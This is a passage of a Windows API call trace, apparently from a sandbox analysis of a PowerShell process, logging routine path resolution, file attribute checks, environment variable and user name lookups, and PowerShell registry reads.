	[0218.880] CoTaskMemFree (pv=0x4bdf80) 
	[0218.900] CoTaskMemAlloc (cb=0x104) returned 0x4bdf80
	[0218.900] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4bdf80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0218.906] CoTaskMemAlloc (cb=0x104) returned 0x4bdf80
	[0218.906] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4bdf80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0218.909] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x29cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0218.909] SetErrorMode (uMode=0x1) returned 0x1
	[0218.909] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x29d200 | out: lpFileInformation=0x29d200*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0218.909] SetErrorMode (uMode=0x1) returned 0x1
	[0218.909] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x29cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0218.910] SetErrorMode (uMode=0x1) returned 0x1
	[0218.910] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x29d200 | out: lpFileInformation=0x29d200*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0218.910] SetErrorMode (uMode=0x1) returned 0x1
	[0218.911] CoTaskMemAlloc (cb=0x104) returned 0x4bdf80
	[0218.911] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4bdf80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0219.362] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x29d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0219.364] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x29cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0219.364] SetErrorMode (uMode=0x1) returned 0x1
	[0219.365] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x29d1c0 | out: lpFileInformation=0x29d1c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0219.365] SetErrorMode (uMode=0x1) returned 0x1
	[0219.365] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x29cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0219.365] SetErrorMode (uMode=0x1) returned 0x1
	[0219.365] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x29d1c0 | out: lpFileInformation=0x29d1c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0219.365] SetErrorMode (uMode=0x1) returned 0x1
	[0219.365] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x29cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0219.365] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x29ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0219.365] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x29cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0219.365] SetErrorMode (uMode=0x1) returned 0x1
	[0219.365] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x29d1c0 | out: lpFileInformation=0x29d1c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0219.365] SetErrorMode (uMode=0x1) returned 0x1
	[0219.365] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x29cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0219.366] SetErrorMode (uMode=0x1) returned 0x1
	[0219.366] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x29d1c0 | out: lpFileInformation=0x29d1c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0219.366] SetErrorMode (uMode=0x1) returned 0x1
	[0219.366] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x29cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0219.366] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x29ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0219.366] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x29cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0219.366] SetErrorMode (uMode=0x1) returned 0x1
	[0219.366] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x29d1c0 | out: lpFileInformation=0x29d1c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0219.366] SetErrorMode (uMode=0x1) returned 0x1
	[0219.366] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x29cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0219.366] SetErrorMode (uMode=0x1) returned 0x1
	[0219.366] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x29d1c0 | out: lpFileInformation=0x29d1c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0219.366] SetErrorMode (uMode=0x1) returned 0x1
	[0219.366] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x29cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0219.367] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\.", nBufferLength=0x105, lpBuffer=0x29ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0219.367] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x29cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0219.367] SetErrorMode (uMode=0x1) returned 0x1
	[0219.367] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x29d1c0 | out: lpFileInformation=0x29d1c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0219.367] SetErrorMode (uMode=0x1) returned 0x1
	[0219.367] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x29cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0219.367] SetErrorMode (uMode=0x1) returned 0x1
	[0219.367] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x29d1c0 | out: lpFileInformation=0x29d1c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0219.367] SetErrorMode (uMode=0x1) returned 0x1
	[0219.367] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x29cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0219.367] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\.", nBufferLength=0x105, lpBuffer=0x29ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0220.252] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x29d260, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0220.252] SetErrorMode (uMode=0x1) returned 0x1
	[0220.252] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x29d4c0 | out: lpFileInformation=0x29d4c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0220.252] SetErrorMode (uMode=0x1) returned 0x1
	[0226.351] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b87d4d0, nSize=0x29d828 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x29d828) returned 0x1
	[0226.353] GetUserNameW (in: lpBuffer=0x46ba40, pcbBuffer=0x29d868 | out: lpBuffer="aETAdzjz", pcbBuffer=0x29d868) returned 1
	[0226.353] CoTaskMemFree (pv=0x46ba40) 
	[0226.355] ReportEventW (hEventLog=0x1b930008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ed7d50*="Available", lpRawData=0x2ed7ae0) returned 1
	[0227.010] CoTaskMemAlloc (cb=0x104) returned 0x4bdf80
	[0227.010] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4bdf80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0227.010] CoTaskMemFree (pv=0x4bdf80) 
	[0227.011] CoTaskMemAlloc (cb=0x104) returned 0x4bdf80
	[0227.012] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4bdf80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0227.012] CoTaskMemFree (pv=0x4bdf80) 
	[0227.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.018] CoTaskMemAlloc (cb=0x104) returned 0x4bdf80
	[0227.018] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x4bdf80, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0227.018] CoTaskMemFree (pv=0x4bdf80) 
	[0227.018] CoTaskMemAlloc (cb=0x104) returned 0x4bdf80
	[0227.018] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x4bdf80, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf
	[0227.018] CoTaskMemFree (pv=0x4bdf80) 
	[0227.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.020] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.020] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.020] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.020] GetCurrentProcessId () returned 0x964
	[0227.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.024] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d848 | out: phkResult=0x29d848*=0x398) returned 0x0
	[0227.024] RegQueryValueExW (in: hKey=0x398, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29d7cc, lpData=0x0, lpcbData=0x29d7c8*=0x0 | out: lpType=0x29d7cc*=0x1, lpData=0x0, lpcbData=0x29d7c8*=0x56) returned 0x0
	[0227.024] CoTaskMemAlloc (cb=0x5a) returned 0x1b835cf0
	[0227.024] RegQueryValueExW (in: hKey=0x398, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29d79c, lpData=0x1b835cf0, lpcbData=0x29d798*=0x56 | out: lpType=0x29d79c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x29d798*=0x56) returned 0x0
	[0227.024] CoTaskMemFree (pv=0x1b835cf0) 
	[0227.024] RegCloseKey (hKey=0x398) returned 0x0
	[0227.024] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.024] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
